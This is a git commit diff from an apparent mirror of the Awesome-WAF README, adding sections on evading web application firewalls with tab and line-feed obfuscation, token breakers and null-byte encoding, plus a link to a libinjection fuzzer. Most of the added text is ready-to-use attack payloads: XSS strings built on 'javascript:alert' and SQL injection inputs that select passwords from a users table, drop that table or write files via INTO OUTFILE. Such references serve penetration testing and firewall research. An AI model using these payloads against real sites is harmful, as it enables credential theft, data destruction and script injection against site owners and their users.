mirror of
https://github.com/0xInfection/Awesome-WAF.git
synced 2024-12-22 22:03:39 +07:00
New tool and some bypass methodologies
This commit is contained in:
parent
b73e02019c
commit
22a5ab8d53
25
README.md
25
README.md
@ -2426,7 +2426,7 @@ An exotic payload crafted:
|
||||
$sdijchkd/???$sdjhskdjh/??t$skdjfnskdj $sdofhsdhjs/???$osdihdhsdj/??ss??$skdjhsiudf
|
||||
```
|
||||
|
||||
__12. Random Tabs__
|
||||
__12. Tabs and Line Feeds__
|
||||
- Tabs often help to evade firewalls especially regex based ones.
|
||||
- Tabs can help break firewall regex when the regex is expecting whitespaces and not tabs.
|
||||
|
||||
@ -2434,13 +2434,30 @@ __Standard__: `<IMG SRC="javascript:alert();">`
|
||||
__Bypassed__: `<IMG SRC=" javascript:alert();">`
|
||||
__Variant__: `<IMG SRC=" jav ascri pt:alert ();">`
|
||||
|
||||
__Standard__: `http://test.com/test?id=1 union select 1,2,3`
|
||||
__Standard__: `http://test.com/test?id=1%09union%23%0A%0Dselect%2D%2D%0A%0D1,2,3`
|
||||
|
||||
__Standard__: `<iframe src=javascript:alert(1)></iframe>`
|
||||
__Obfuscated__:
|
||||
```
|
||||
<iframe src=j	a	v	a	s	c	r	i	p	t	:a	l	e	r	t	%28	1	%29></iframe>
|
||||
```
|
||||
|
||||
__13. Obfuscation in Other Formats__
|
||||
__13. Token Breakers__
|
||||
- Attacks on tokenizers attempt to break the logic of splitting a request into tokens with the help of token breakers.
|
||||
- Token breakers are symbols that allow affecting the correspondence between an element of a string and a certain token, and thus bypass search by signature.
|
||||
- However, the request must still remain valid while using token-breakers.
|
||||
|
||||
__Case__: Unknown Token for the Tokenizer
|
||||
__Payload__: `?id=‘-sqlite_version() UNION SELECT password FROM users --`
|
||||
|
||||
__Case__: Unknown Context for the Parser (Notice the uncontexted bracket)
|
||||
__Payload 1__: `?id=123);DROP TABLE users --`
|
||||
__Payload 2__: `?id=1337) INTO OUTFILE ‘xxx’ --`
|
||||
|
||||
> __TIP:__ More payloads can be crafted via this [cheat sheet](https://github.com/attackercan/cpp-sql-fuzzer).
|
||||
|
||||
__14. Obfuscation in Other Formats__
|
||||
- Many web applications support different encoding types and can interpret the encoding (see below).
|
||||
- Obfuscating our payload to a format not supported by WAF but the server can smuggle our payload in.
|
||||
|
||||
@ -2581,6 +2598,9 @@ Payload examples:
|
||||
<scri\x00pt>alert(1);</scri%00pt>
|
||||
<s%00c%00r%00%00ip%00t>confirm(0);</s%00c%00r%00%00ip%00t>
|
||||
```
|
||||
__Standard__: `<a href="javascript:alert()">`
|
||||
__Obfuscated__: `<a href="ja0x09vas0x0A0x0Dcript:alert(1)">clickme</a>`
|
||||
__Variant__: `<a 0x00 href="javascript:alert(1)">clickme</a>`
|
||||
|
||||
#### Parsing Bugs:
|
||||
- RFC states that NodeNames cannot begin with whitespace.
|
||||
@ -3186,6 +3206,7 @@ User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
|
||||
### Evasion:
|
||||
- [WAFNinja](https://github.com/khalilbijjou/wafninja) - A smart tool which fuzzes and can suggest bypasses for a given WAF by [@khalilbijjou](https://github.com/khalilbijjou/).
|
||||
- [WAFTester](https://github.com/Raz0r/waftester) - Another tool which can obfuscate payloads to bypass WAFs by [@Raz0r](https://github.com/Raz0r/).
|
||||
- [libinjection-fuzzer](https://github.com/migolovanov/libinjection-fuzzer) - A fizzer intended for finding `libinjection` bypasses but can be probably used universally.
|
||||
- [bypass-firewalls-by-DNS-history](https://github.com/vincentcox/bypass-firewalls-by-DNS-history) - A tool which searches for old DNS records for finding actual site behind the WAF.
|
||||
- [abuse-ssl-bypass-waf](https://github.com/LandGrey/abuse-ssl-bypass-waf) - A tool which finds out supported SSL/TLS ciphers and helps in evading WAFs.
|
||||
- [SQLMap Tamper Scripts](https://github.com/sqlmapproject/sqlmap) - Tamper scripts in SQLMap obfuscate payloads which might evade some WAFs.
|
||||
|
Loading…
Reference in New Issue
Block a user